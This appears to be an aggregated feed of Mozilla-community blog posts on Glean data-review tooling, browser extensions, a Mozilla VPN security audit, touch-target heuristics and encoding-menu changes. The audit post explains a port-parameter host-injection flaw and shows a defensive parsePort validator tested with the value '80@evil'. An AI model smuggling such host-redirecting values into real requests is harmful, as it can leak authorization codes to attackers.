(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index.

At Mozilla we put a lot of stock in Openness. Source? Open. Bug tracker? Open. Discussion Forums (Fora?)? Open (synchronous and asynchronous).

We also have an open process for determining if a new or expanded data collection in a Mozilla project is in line with our Privacy Principles and Policies: Data Review.

Basically, when a new piece of instrumentation is put up for code review (or before, or after), the instrumentor fills out a form and asks a volunteer Data Steward to review it. If the instrumentation (as explained in the filled-in form) is obviously in line with our privacy commitments to our users, the Data Steward gives it the go-ahead to ship.

(If it isn’t _obviously_ okay then we kick it up to our Trust Team to make the decision. They sit next to Legal, in case you need to find them.)

The Data Review Process and its forms are very generic. They’re designed to work for any instrumentation (tab count, bytes transferred, theme colour) being added to any project (Firefox Desktop, mozilla.org, Focus) and being collected by any data collection system (Firefox Telemetry, Crash Reporter, Glean). This is great for the process as it means we can use it and rely on it anywhere.

It isn’t so great for users _of_ the process. If you only ever write Data Reviews for one system, you’ll find yourself answering the same questions with the same answers every time.

And Glean makes this worse (better?) by including in its metrics definitions almost every piece of information you need in order to answer the review. So now you get to write the answers first in YAML and then in English during Data Review.

But no more! Introducing glean_parser data-review and mach data-review: command-line tools that will generate for you a Data Review Request skeleton with all the easy parts filled in. It works like this:

  1. Write your instrumentation, providing full information in the metrics definition.
  2. Call python -m glean_parser data-review <bug_number> <list of metrics.yaml files> (or mach data-review <bug_number> if you’re adding the instrumentation to Firefox Desktop).
  3. glean_parser will parse the metrics definitions files, pull out only the definitions that were added or changed in <bug_number>, and then output a partially-filled-out form for you.

Here’s an example. Say I’m working on bug 1664461 and add a new piece of instrumentation to Firefox Desktop:

fog.ipc:
  replay_failures:
    type: counter
    description: |
      The number of times the ipc buffer failed to be replayed in the
      parent process.
    bugs:
      - https://bugzilla.mozilla.org/show_bug.cgi?id=1664461
    data_reviews:
      - https://bugzilla.mozilla.org/show_bug.cgi?id=1664461
    data_sensitivity:
      - technical
    notification_emails:
      - [email protected]
      - [email protected]
    expires: never

I’m sure to fill in the `bugs` field correctly (because that’s important on its own _and_ it’s what glean_parser data-review uses to find which data I added), and have categorized the data_sensitivity. I also included a helpful description. (The data_reviews field currently points at the bug I’ll attach the Data Review Request for. I’d better remember to come back before I land this code and update it to point at the specific comment…)

Then I can simply use mach data-review 1664461 and it spits out:

!! Reminder: it is your responsibility to complete and check the correctness of
!! this automatically-generated request skeleton before requesting Data
!! Collection Review. See https://wiki.mozilla.org/Data_Collection for details.

DATA REVIEW REQUEST
1. What questions will you answer with this data?

TODO: Fill this in.

2. Why does Mozilla need to answer these questions? Are there benefits for users?
   Do we need this information to address product or business requirements?

TODO: Fill this in.

3. What alternative methods did you consider to answer these questions?
   Why were they not sufficient?

TODO: Fill this in.

4. Can current instrumentation answer these questions?

TODO: Fill this in.

5. List all proposed measurements and indicate the category of data collection for each
   measurement, using the Firefox data collection categories found on the Mozilla wiki.

Measurement Name | Measurement Description | Data Collection Category | Tracking Bug
---------------- | ----------------------- | ------------------------ | ------------
fog_ipc.replay_failures | The number of times the ipc buffer failed to be replayed in the parent process.  | technical | https://bugzilla.mozilla.org/show_bug.cgi?id=1664461


6. Please provide a link to the documentation for this data collection which
   describes the ultimate data set in a public, complete, and accurate way.

This collection is Glean so is documented
[in the Glean Dictionary](https://dictionary.telemetry.mozilla.org).

7. How long will this data be collected?

This collection will be collected permanently.
**TODO: identify at least one individual here** will be responsible for the permanent collections.

8. What populations will you measure?

All channels, countries, and locales. No filters.

9. If this data collection is default on, what is the opt-out mechanism for users?

These collections are Glean. The opt-out can be found in the product's preferences.

10. Please provide a general description of how you will analyze this data.

TODO: Fill this in.

11. Where do you intend to share the results of your analysis?

TODO: Fill this in.

12. Is there a third-party tool (i.e. not Telemetry) that you
    are proposing to use for this data collection?

No.

As you can see, this Data Review Request skeleton comes partially filled out. Everything you previously had to mechanically fill out has been done for you, leaving you more time to focus on only the interesting questions like “Why do we need this?” and “How are you going to use it?”.

Also, this saves you from having to remember the URL to the Data Review Request Form Template each time you need it. We’ve got you covered.

And since this is part of Glean, it’s already available to every project you can see here. This isn’t just a Firefox Desktop thing.

Hope this saves you some time! If you can think of other time-saving improvements we could add to Glean once, so that every Mozilla project can take advantage of them, please tell us on Matrix.

If you’re interested in how this is implemented, glean_parser’s part of this is over here, while the mach command part is here.

:chutten

Cameron KaiserTenFourFox FPR32 SPR4 available

TenFourFox Feature Parity Release 32 Security Parity Release 4 "32.4" is available for testing (downloads, hashes). There are, as before, no changes to the release notes nor anything notable about the security patches in this release. Assuming no major problems, FPR32.4 will go live Monday evening Pacific time as usual. The final official build FPR32.5 remains scheduled for October 5, so later this month we'll take a look at your options should you wish to continue building from source after that point.

Firefox Add-on ReviewsuBlock Origin—everything you need to know about the ad blocker

Rare is the browser extension that can satisfy both passive and power users. But that’s an essential part of uBlock Origin’s brilliance—it is an ad blocker you could recommend to your most tech-forward friend as easily as you could to someone who’s just emerged from the jungle lost for the past 20 years.

If you install uBlock Origin and do nothing else, right out of the box it will block nearly all types of internet advertising—everything from big blinking banners to search ads and video pre-rolls and all the rest. However, if you want extremely granular levels of content control, uBlock Origin can accommodate via advanced settings.

We’ll try to split the middle here and walk through a few of the extension’s most intriguing features and options…

Does using uBlock Origin actually speed up my web experience? 

Yes. Not only do web pages load faster because the extension blocks unwanted ads from loading, but uBlock Origin utilizes a uniquely lightweight approach to content filtering, so it imposes minimal impact on memory consumption. It is generally accepted that uBlock Origin offers the biggest speed boost among top ad blockers.

But don’t ad blockers also break pages? 

Occasionally that can occur: a page may break if certain content is blocked, and some websites will even detect the presence of an ad blocker and deny access.

Fortunately this doesn’t happen as frequently with uBlock Origin as it might with other ad blockers, and the extension is also extremely effective at bypassing anti-ad blockers (yes, an ongoing battle rages between ad tech and content blocking software). But if uBlock Origin does happen to break a page you want to access, it’s easy to turn off content blocking for specific pages you trust, or whose ads you perhaps even want to see.

Hit the blue on/off button if you want to suspend content blocking on any page.

Show us a few tips & tricks

Let’s take a look at some high level settings and what you can do with them. 

  • Lightning bolt button enables Element Zapper, which lets you temporarily remove page elements by simply mousing over them and clicking. For example, this is convenient for removing embedded gifs or for hiding disturbing images you may encounter in some news articles.
  • Eye dropper button enables Element Picker, which lets you permanently remove page elements. For example, if you find Facebook Stories a complete waste of time, just activate Element Picker, mouse over/click the Stories section of the page, select “Create” and presto—The End of Facebook Stories.    

The five buttons on this row will only affect the page you’re on.

  • Pop-up button blocks—you guessed it—pop-ups
  • Film button blocks large media elements like embedded video, audio, or images
  • Eye slash button disables cosmetic filtering, which is on by default and elegantly reformats your pages when ads are removed, but if you’d prefer to see pages laid out as they were intended (with just empty spaces instead of ads) then you have that option
  • “Aa” button blocks remote fonts from loading on the page
  • “</>” button disables JavaScript on the page

Does uBlock Origin protect against malware? 

In addition to using various advertising block lists, uBlock Origin also leverages potent lists of known malware sources, so it automatically blocks those for you as well. To be clear, there is no software that can offer 100% malware protection, but it doesn’t hurt to give yourself enhanced protections like this. 

All of the content block lists are actively maintained by volunteers who believe in the mission of providing users with more choice and control over the content they see online. “uBlock Origin stands uncompromisingly for all users’ best interests, it’s not monetized, and its development and maintenance is driven only by volunteers who share the same view,” says uBlock Origin founder and developer Raymond Hill. “As long as I am the maintainer of [uBlock Origin], this will not change.”

We could go into a lot more detail about uBlock Origin—how you can create your own custom filter lists, how you can set it to block only media of a certain size, cloud storage sync, and so on—but power users will discover these delights on their own. Hopefully we’ve provided enough insight here to help you make an informed choice about exploring uBlock Origin, whether it be your first ad blocker or just the latest. 

If you’d like to check out other amazing ad blocker options, please see What’s the best ad blocker for you?

Mark MayoCelebrating 10k KryptoSign users with an on-chain lottery feature!

TL;DR: we’re adding 3 new features to KryptoSign today!

  • CSV downloads of a document’s signers
  • Document Locking (prevent further signing)
  • Document Lotteries (pick a winner from list of signers)

Why? Well, you folks keep abusing this simple Ethereum-native document signing tool to run contests for airdrops and pre-sales, so we thought we’d make your lives a bit easier! :)

[Graph: up-and-to-the-right growth of KryptoSign users]

We launched KryptoSign in May this year as a tool for Kai, Bart, and me to do the lightest possible “contract signing” using our MetaMask wallets. Write down a simple scope of work with someone, and both parties sign with their wallets to signal they agree. When the job is complete, their Ethereum address is right there to copy-n-paste into a wallet to send payment. Quick, easy, delightful. :)

But as often happens, users started showing up and using it for other things. Like guestbooks. And then guestbooks became a way to sign up users for NFT drops as part of contests and pre-sales, and so on. The organizer has everyone sign a KS doc, maybe link their Discord or Twitter, and then picks a winner and sends an NFT/token/etc. to their address in the signature block. Cool.

As these NFT drops started getting really hot the feature you all wanted was pretty obvious: have folks sign a KS document as part of a pre-sales window, and have KS pick the winner automatically. Because the stakes on things like hot NFT pre-sales are high, we decided to implement the random winner using Chainlink’s VRF — verifiable random functions — which means everyone involved in a KryptoSign lottery can independently confirm how the random winner was picked. Transparency is nice!

The UI for doing this is quite simple, as you’d hope and expect from KryptoSign. There’s an action icon on the document now:

[Screenshot: menu option to pick a winner from the signers of a document]

When you’re ready to pick a winner, it’s pretty easy. Lock the document, and hit the button:

Of note, to pick a winner we’re collecting 0.05 ETH from you to cover the cost of the 2 LINK required to invoke the VRF on mainnet. You don’t need your own LINK and all the gas-incurring swapping that would imply. Phew! The user approves a single transaction with their wallet (including gas to interact with the smart contract) and they’re done.

Our initial users really wanted the on-chain trust of a VRF, and are willing to pay for it so their communities can trust the draw, but for other use cases you have in mind, maybe it’s overkill? Let us know! We’ll continue to build upon KryptoSign as long as people find useful things to do with it.

Finally, big props to our team who worked through some rough patches with calling the Chainlink VRF contract. Blockchain is weird, yo! This release saw engineering contributions from Neo Cho, Ryan Ouyang, and Josh Peters. Thanks!

— Mark



Mozilla Security BlogMozilla VPN Security Audit

To provide transparency into our ongoing efforts to protect your privacy and security on the Internet, we are releasing a security audit of Mozilla VPN that Cure53 conducted earlier this year.

The scope of this security audit included the following products:

  • Mozilla VPN Qt5 App for macOS
  • Mozilla VPN Qt5 App for Linux
  • Mozilla VPN Qt5 App for Windows
  • Mozilla VPN Qt5 App for iOS
  • Mozilla VPN Qt5 App for Android

Here’s a summary of the items discovered within this security audit that were medium or higher severity:

  • FVP-02-014: Cross-site WebSocket hijacking (High)
    • The Mozilla VPN client, when put in debug mode, exposes a WebSocket interface to localhost to trigger events and retrieve logs (most of the functional tests are written on top of this interface). As the WebSocket interface was used only in pre-release test builds, no customers were affected. Cure53 has verified that this item has been properly fixed and the security risk no longer exists.
  • FVP-02-001: VPN leak via captive portal detection (Medium)
    • The Mozilla VPN client allows sending unencrypted HTTP requests outside of the tunnel to specific IP addresses if the captive portal detection mechanism has been activated through settings. However, the captive portal detection algorithm requires a plain-text HTTP trusted endpoint to operate. Firefox, Chrome, the network manager of macOS, and many other applications have a similar solution enabled by default. Mozilla VPN utilizes the Firefox endpoint. Ultimately, we have accepted this finding, as the user benefits of captive portal detection outweigh the security risk.
  • FVP-02-016: Auth code could be leaked by injecting port (Medium)
    • When a user wants to log into Mozilla VPN, the VPN client will make a request to https://vpn.mozilla.org/api/v2/vpn/login/windows to obtain an authorization URL. The endpoint takes a port parameter that is reflected in an <img> element after the user signs into the web page. It was found that the port parameter could be of an arbitrary value. Further, it was possible to inject the @ sign, so that the request would go to an arbitrary host instead of localhost (the site’s strict Content Security Policy prevented such requests from being sent). We fixed this issue by improving the port number parsing in the REST API component; the fix includes several tests to prevent similar errors in the future. A rough sketch of this kind of strict parsing follows after this list.
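
The following TypeScript sketch illustrates the general idea of strict port parsing; parsePort is a hypothetical helper for illustration, not the actual Mozilla VPN code:

// Hypothetical sketch; not the actual Mozilla VPN fix.
// Accept only a short digit string that maps to a valid port number.
function parsePort(raw: string): number | null {
  // 1 to 5 ASCII digits only: rejects signs, whitespace, and "@"-style host injection.
  if (!/^\d{1,5}$/.test(raw)) {
    return null;
  }
  const port = Number(raw);
  return port >= 1 && port <= 65535 ? port : null;
}

console.log(parsePort("8080"));     // 8080
console.log(parsePort("80@evil"));  // null: injection attempt rejected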

If you’d like to read the detailed report from Cure53, including all low and informational items, you can find it here.

More information on the issues identified in this report can be found in our MFSA2021-31 Security Advisory published on July 14th, 2021.

The post Mozilla VPN Security Audit appeared first on Mozilla Security Blog.

Mozilla Open Policy & Advocacy BlogMozilla Mornings on the Digital Markets Act: Key questions for Parliament

On 13 September, Mozilla will host the next installment of Mozilla Mornings – our regular event series that brings together policy experts, policymakers and practitioners for insight and discussion on the latest EU digital policy developments.

For this installment, we’re checking in on the Digital Markets Act. Our panel of experts will discuss the key outstanding questions as the debate in Parliament reaches fever pitch.

Speakers

Andreas Schwab MEP
IMCO Rapporteur on the Digital Markets Act
Group of the European People’s Party

Mika Shah
Co-Acting General Counsel
Mozilla

Vanessa Turner
Senior Advisor
BEUC

With opening remarks by Raegan MacDonald, Director of Global Public Policy, Mozilla

Moderated by Jennifer Baker
EU technology journalist

 

Logistical details

Monday 13 September, 17:00 – 18:00 CEST

Zoom Webinar

Register here

Webinar login details to be shared on day of event

The post Mozilla Mornings on the Digital Markets Act: Key questions for Parliament appeared first on Open Policy & Advocacy.

Niko MatsakisNext CTCFT Meeting: 2021-09-20

Hold the date! The next Cross Team Collaboration Fun Times meeting will be 2021-09-20. We’ll be using the “Asia-friendly” time slot of 21:00 EST.

What will the talks be about?

A detailed agenda will be announced in a few weeks. Current thinking, however, is to center the agenda on Rust interest groups and domain working groups, those brave explorers who are trying to put Rust to use in all kinds of interesting domains, such as game development, cryptography, machine learning, formal verification, and embedded development. If you run an interest group and I didn’t list your group here, perhaps you want to get in touch! We’ll be talking about how these groups operate and how we can do a better job of connecting interest groups with the Rust org.

Will there be a social hour?

Absolutely! The social hour has been an increasingly popular feature of the CTCFT meeting. It will take place after the meeting (22:00 EST).

How can I get this on my calendar?

The CTCFT meetings are announced on this google calendar.

Wait, what about August?

Perceptive readers will note that there was no CTCFT meeting in August. That’s because I and many others were on vacation. =)

Firefox Add-on ReviewsBoost your writing skills with a browser extension

Whatever kind of writing you do—technical documentation, corporate communications, Harry Potter-vampire crossover fan fiction—it likely happens online. Here are some great browser extensions that will benefit anyone who writes on the web. Get grammar help, productivity tools, and other strong writing aids… 

LanguageTool

It’s like having your own copy editor with you wherever you write on the web. Language Tool – Grammar and Spell Checker will make you a better writer in 25+ languages. 

More than just a spell checker, LanguageTool also…

  • Recognizes common misuses of similar sounding words (e.g. there/their or your/you’re)
  • Works on social media sites and email
  • Offers alternate phrasing and style suggestions for brevity and clarity

Dictionary Anywhere

Need a quick word definition? With Dictionary Anywhere just double-click any word you find on the web and get an instant pop-up definition. 

You can even save and download words and their definitions for later offline reference. 

Dictionary Anywhere — no more navigating away from a page just to get a word check.

Dark Background and Light Text

Give your eyes a break, writers. Dark Background and Light Text makes staring at blinking words all day a whole lot easier on your lookers. 

Really simple to use out of the box. Once installed, the extension’s default settings automatically flip the colors of every web page you visit. But if you’d like more granular control of color settings, just click the extension’s toolbar button to access a pop-up menu that lets you customize color schemes, set page exceptions for sites you don’t want colors inverted on, and more.

Dark Background and Light Text goes easy on the eyes.

Clippings

If your online writing requires the repeated use of certain phrases (for example, work email templates or customer support responses), Clippings can be a huge time saver. 

Key features…

  • Create a practically limitless library of saved phrases
  • Paste your clippings anywhere via context menu
  • Organize batches of clippings with folders and color coded labels
  • Shortcut keys for power users
  • Extension supported in English, Dutch, French, German, and Portuguese (Brazil)
Clippings handles bulk cutting/pasting.

We hope one of these extensions helps your words pop off the screen. Some writers may also be interested in this collection of great productivity extensions for optimizing written project plans. Feel free to explore thousands of other potentially useful extensions on addons.mozilla.org.

Eitan IsaacsonHTML AQI Gauge

I needed a meter to tell me what the air quality is like outside. Now I know!

If you need one as well, or if you are looking for an accessible gauge for anything else, here you go.

You can also mess with it on Codepen.
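
The embedded gauge doesn’t survive syndication, but the core accessibility idea is small enough to sketch here. This is a minimal TypeScript sketch, assuming a host element with the hypothetical id "aqi-gauge"; the thresholds follow the standard US EPA AQI categories:

// Minimal sketch of an accessible gauge; assumes an element with id="aqi-gauge".
function renderAqiGauge(aqi: number): void {
  const gauge = document.getElementById("aqi-gauge");
  if (!gauge) {
    return;
  }

  // role="meter" tells assistive technology this is a scalar measurement
  // within a known range, not a progress indicator.
  gauge.setAttribute("role", "meter");
  gauge.setAttribute("aria-valuemin", "0");
  gauge.setAttribute("aria-valuemax", "500");
  gauge.setAttribute("aria-valuenow", String(aqi));

  // aria-valuetext gives screen readers a human-readable reading.
  const label =
    aqi <= 50 ? "Good" :
    aqi <= 100 ? "Moderate" :
    aqi <= 150 ? "Unhealthy for sensitive groups" :
    aqi <= 200 ? "Unhealthy" :
    aqi <= 300 ? "Very unhealthy" : "Hazardous";
  gauge.setAttribute("aria-valuetext", "AQI " + aqi + ": " + label);
  gauge.textContent = aqi + " (" + label + ")";
}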


Dennis SchubertWebCompat Tale: Touching Clickable Things

Did you know your finger is larger than one pixel? I mean, sure, your physical finger should always be larger than one pixel, unless your screen has a really low resolution. But did you know that when using Firefox for Android, your finger is actually 6x7 millimeters large? Now you do!

Unlike a pixel-perfect input device like a mouse or even a laptop’s trackpad, your finger is weird. Not only is it all soft and squishy, it also actively obstructs your view when touching things on the screen. When you use a web browser and want to click on a link, it is surprisingly difficult to hit it accurately with the center of your fingertip, which is what your touchscreen driver sends to the browser. To help you out, your friendly Firefox for Android slightly enlarges the “touch point”.

Usually, this works fine and is completely transparent to users. Sometimes, however, it breaks things.

Here is an example of a clever CSS-only implementation of a menu with collapsible sub-navigation that I extracted from an actual Web Compatibility bug report I looked at earlier. Please do not actually use this; it is broken by design to make a point. :) Purely visual CSS declarations have been omitted for brevity.

Source:

<style>
  #menu-demo li ul {
    display: none;
  }

  #menu-demo li:hover ul {
    display: block;
  }
</style>
<section id="menu-demo">
  <ul>
    <li><a href="#menu-demo">One</a></li>
    <li>
      <span>Two with Subnav</span>
      <ul>
        <li><a href="#menu-demo">Two &gt; One</a></li>
        <li><a href="#menu-demo">Two &gt; Two</a></li>
      </ul>
    </li>
    <li><a href="#menu-demo">Three</a></li>
  </ul>
</section>

Result:

Now, just imagine that on Desktop, this is a horizontal menu and not a vertical list, but I’m too lazy to write media queries right now. It works fine on Desktop. However, if you try this in Firefox for Android, you will find that it’s pretty much impossible to select the second entry, and you will just hit “One” or “Three” most of the time.

To understand what’s going on here, we have to talk about two things: the larger “finger radius” I explained earlier, and the rules by which Firefox detects the element the user probably wanted to click on.

Touch Point expansion

The current touch point expansion settings, as set by the ui.mouse.radius.* preferences in about:config, are: 5mm to the top; 3mm to the left; 3mm to the right; 2mm to the bottom. There probably is a good reason why the top/bottom expansion is asymmetric, and I assume this has something to do with viewing angles or how your finger is shaped, but I actually don’t know.
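
For illustration, here is roughly what that expansion computes, sketched in TypeScript. This is not Firefox’s actual implementation; pxPerMm is a hypothetical parameter derived from the device’s DPI:

// Illustrative sketch only; not Firefox's actual code.
interface Rect { left: number; top: number; right: number; bottom: number; }

// Expand a touch point into the area treated as "touched", using the
// ui.mouse.radius.* defaults: 5mm top, 3mm left/right, 2mm bottom.
function expandTouchPoint(x: number, y: number, pxPerMm: number): Rect {
  return {
    left:   x - 3 * pxPerMm,
    right:  x + 3 * pxPerMm,
    top:    y - 5 * pxPerMm,
    bottom: y + 2 * pxPerMm,
  };
}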

To visualize this, I prepared a little annotated screenshot of how this “looks like” on my testing Android device:

[Screenshot: the live menu demo from above. A red dot in the middle of “Two with Subnav” marks where the user placed the middle of their finger, and a blue border marks the area Firefox considers “touched”, spanning well into the “One” menu item.]

The red dot marks the center of the touch point, the blue outline marks the area as expanded by Firefox for Android. As you can see, the expanded touch area covers part of the previous menu item, “One”. If you’d try to touch lower on the item, then the bottom expansion will start to cover parts of the “Three” item. In this example, you have a 9px window to actually hit “Two with Subnav”. On my device, that’s roughly 0.9mm. Good luck with that!

With this expansion in mind, you might wonder why you’re not hitting the wrong items all the time. Fair question.

“Clickable” elements

Firefox doesn’t just click on every element inside this expanded area. Instead, Firefox tries to find the “clickable element closest to the original touch point”. If all three <li>s contained links, then this wouldn’t be an issue: links are clickable elements, and “Two with Subnav” would, without a doubt, be the closest. However, in this example, it’s not a link, and then the rules are a little bit more complicated.

Things Firefox considers “clickable” for the purpose of finding the right element:

  • <a>s.
  • <button>, <input>, <select>, <textarea>, <label>, and <iframe>.
  • Elements with JavaScript listeners for:
    • click, mousedown, mouseup
    • touchstart, touchend
    • pointerdown, pointerup
  • Elements with contenteditable="true".
  • Elements with role="button".
  • Elements with cursor: pointer assigned via CSS.

Unfortunately, none of the rules above are true for the “Two with Subnav” element in the example above. And this means that the “closest clickable element” to the touch point here is, well, “One”. And so, Firefox dispatches the click event to that one.

Matching any of the conditions, even simply changing the cursor via CSS, would provide the browser with enough context to do “the right thing” here.
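
As a sketch against the demo markup above (illustrative only, not the site’s actual fix), any one of the following hints would satisfy the heuristic:

// Give the submenu trigger an explicit "clickable" hint.
const trigger = document.querySelector<HTMLSpanElement>("#menu-demo li > span");
if (trigger) {
  trigger.setAttribute("role", "button");       // semantic hint (also helps accessibility)
  trigger.style.cursor = "pointer";             // a CSS pointer cursor counts as clickable
  trigger.addEventListener("click", () => {});  // so does a JavaScript click listener
}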

Conclusion

This issue, once again, is one of those cases where I do not yet have a satisfying outcome. I wrote a message to the site’s authors, but given the site is based on a Joomla template from 2013, I do not have high hopes here. As for changes inside Firefox, we could treat elements with :hover styling and mouseover listeners as “clickable”, and I filed a bug to suggest as much, but I’m not yet convinced this is the right thing to do. From what I can tell, neither Chrome nor Safari do a similar expansion, so just dropping it from Firefox is another idea. But I kinda like the way it makes things better 99.9% of the time.

In any case, this serves as yet another reminder of why having semantically correct markup is important. Not only do attributes like role="button" on clickable elements help out anyone relying on accessibility features and tooling, browsers also depend on these kinds of hints. Use the tools you have, there’s a reason why the role attribute is part of the web. :)

Update from 2021-08-25

Good news! The developer responsible for the site has responded, and they did fix the issue by adding role="button" to the links. Huge success!

Mozilla Performance BlogPerformance Sheriff Newsletter (July 2021)

In July there were 105 alerts generated, resulting in 20 regression bugs being filed on average 6.6 days after the regressing change landed.

Welcome to the July 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics, followed by some details on how we’re growing the test engineering team. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.4 days
  • 88% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 2.7 days
  • 89% of valid regressions were associated with bugs within 5 days

[Chart: Sheriffing Efficiency (July 2021)]

It’s initially disappointing to see the alert-to-bug time increase last month; however, after some investigation it appears that a single alert has thrown this out. With fewer alerts (as we’ve seen over the last two months), any that exceed our targets have an increased impact on our average response times. In this case, it was this alert for a 2% glvideo regression. The backfill bot did trigger backfills for this job, however the culprit commit still wasn’t clear. Even after over 250 retriggers, the sheriff was unable to determine a culprit. Perhaps a better way to measure the effectiveness of the auto backfills is to look at the average time from alert to bug where we meet the threshold, filtering out alerts that are particularly challenging for our sheriffs.

Join the team!

I’m excited to share that the performance test engineering team is currently hiring! We have ambitious plans to modernise and unify our performance test frameworks, automate more of our regression sheriffing workflows, increase the accuracy and sensitivity of our regression detection, and support the culture of performance at Mozilla. By growing the team we hope to accelerate these efforts and ensure every Firefox release performs better than the last.

We’re looking for candidates with 2-5 years of software development experience. Whilst not a requirement, these roles would suit individuals with experience or interest in performance, profiling, data analysis, machine learning, TCP/IP, and web technologies. Experience with Python and JavaScript would also be beneficial, as these will be used extensively in the role.

If you’re interested in helping us to build the future of performance testing at Mozilla, and to have a direct impact on the performance of Firefox, then please take a look over the following job descriptions:

Note that the first role is based in Toronto as we have a number of team members in this location, and currently feel that hiring in this location would provide a better opportunity for the successful candidate. The senior role is remote US and Canada.

You can learn more about the team on our wiki page, and if you’re interested in joining us, you can apply directly from the job descriptions above. If these positions don’t interest you, but you like the idea of working to keep the internet open and accessible to all, take a look over our other open positions.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for July can be found here (for those with access).

Henri SivonenThe Text Encoding Submenu Is Gone

For context, please see Character Encoding Menu in 2014, Text Encoding Menu in 2021, and A Look at Encoding Detection and Encoding Menu Telemetry from Firefox 86.

Firefox 91 was released two weeks ago. This is the first release that does not have a Text Encoding submenu. Instead, the submenu has been replaced with a single menu item called Repair Text Encoding. It performs the action that was previously performed by the Automatic item in the Text Encoding submenu: it runs chardetng with UTF-8 as a permitted outcome, ignoring the top-level domain.

The Repair Text Encoding menu item is in the View menu, which is hidden by default on Windows and Linux. The action is also available as an optional toolbar button (invoke the context menu on empty space in the toolbar and choose Customize Toolbar…). On Windows and Linux, you can invoke the menu item from the keyboard by pressing the v key while holding the alt key and then pressing the c key. (The keys may vary with the localization.)

What Problem Does “Repair Text Encoding” Solve?

  1. Sometimes the declared encoding is wrong, and the Web Platform would become more brittle if we started second-guessing the declared encoding automatically without user action.

    The typical case is that university faculty have created content over the years that is still worthwhile to read, and the old content is in a legacy encoding. However, independently of the faculty, the administrator has, either explicitly or as a side effect of a server software update, caused the server configuration to claim UTF-8 server-wide even though this is wrong for old content. When the content is in the Latin script, the result is still readable. When the content is in a non-Latin script, the result is completely unreadable (without this feature); see the sketch after this list.

  2. For non-Latin scripts, unlabeled UTF-8 is completely unreadable. Fixing this problem without requiring user action and also without making the Web Platform more brittle is a hard problem; there is a separate write-up on that topic alone. This problem might get solved one day in a way that does not involve user action, but not today.
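
To make the first case concrete, here is a hedged sketch of the misconfiguration (the header and the legacy encoding are generic examples, not from any specific site):

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8

The header above is now sent for every page on the server, while the bytes of the decade-old page are actually in, say, EUC-JP with no correct label anywhere. Decoded as UTF-8, Latin-script text mostly survives, but Japanese text turns into mojibake; Repair Text Encoding addresses this by re-running chardetng on the page.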

Why Remove the Other Submenu Items?

  • Supporting the specific manually-selectable encodings caused significant complexity in the HTML parser when trying to support the feature securely (i.e. not allowing certain encodings to be overridden). With the current approach, the parser only needs to know of a single flag that forces it to run chardetng, which it has to be able to run in other situations anyway. Previously, the parser needed to keep track of a specific manually-specified encoding alongside the encoding information from the Web sources.

    Indeed, when implementing support for declaring the encoding via the bogo XML declaration, the above-mentioned complexity got in the way, and I wish I had replaced the menu with a single item before implementing that support. Now, I wanted to get rid of the complexity before aligning meta charset handling with WebKit and Blink.

  • An elaborate UI surface for a niche feature risks the whole feature getting removed, which is bad if the feature is still relevant to (a minority of) users. (Case in point: the Proton UI refresh removed the Text Encoding menu entry point from the hamburger menu.)

  • Telemetry showed users making a selection from the menu when the encoding of the page being overridden had come from a previous selection from the menu. This suggested that users aren’t that good at choosing correctly manually.

Why Not Remove the Whole Thing?

Chrome removed their menu altogether as part of what they called Project Eraser. (Amusingly, this led to a different department of Google publishing a support article about using other browsers to access this functionality.) Mobile versions of Chrome, Safari, and Firefox don’t have the menu, either. So why not just follow Chrome?

Every time something in this area breaks intentionally or accidentally, feedback from Japan shows up relatively quickly. That’s the main reason why I believe users in Japan still care about having the ability to override the encoding of misconfigured pages. (That’s without articulating any particular numeric telemetry threshold for keeping the feature. However, telemetry confirms that the feature is relevant to the largest number of distinct telemetry submitters, both in absolute numbers and in region-total-relative numbers, in Japan.)

If we removed the feature, we’d remove a reason for these users to stay with Firefox. Safari and Gnome Web still have more elaborate encoding override UI built in (the list of encodings in both is questionably curated but the lists satisfy the Japanese use cases), and there are extensions for Chrome.

Shouldn’t This Be an Extension?

The built-in UI action in Firefox is more discoverable, more usable, and safer against the user getting baited into self-XSS than the Chrome extensions. Retaining the safety properties but moving the UI to an extension would increase implementation complexity while reducing discoverability—i.e. would help fewer users at a higher cost.

Removing the engine feature and leaving it to an extension to rewrite the headers of HTTP responses (as in Chrome) would:

  • Give Chrome a day-one advantage, since the extension(s) for Chrome already exist.
  • Fail to help the users who don’t discover an extension.
  • Regress usability by about a decade due to the extension UI being unaware of what’s going on inside the engine.
  • Remove self-XSS protections.

The Talospace ProjectOpenPOWER Firefox JIT update

As of this afternoon, the Baseline Interpreter-only form of the OpenPOWER JIT (64-bit little-endian) now passes all of the JIT tests except for the Wasm ones, which are being actively worked on. Remember, this is just the first of the three phases and we need all three for the full benefit, but it already yields a noticeable boost in my internal tests over the C++ interpreter. The MVP is Baseline Interpreter and Wasm, so once it passes the Wasm tests as well, it's time to pull it current with 91ESR. You can help.

Data@MozillaThis Week in Glean: Why choosing the right data type for your metric matters

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

One of my favorite tasks that comes up in my day to day adventure at Mozilla is a chance to work with the data collected by this amazing Glean thing my team has developed. This chance often arises when an engineer needs to verify something, or a product manager needs a quick question answered. I am not a data scientist (and I always include that caveat when I provide a peek into the data), but I do understand how the data is collected, ingested, and organized and I can often guide people to the correct tools and techniques to find what they are looking for.

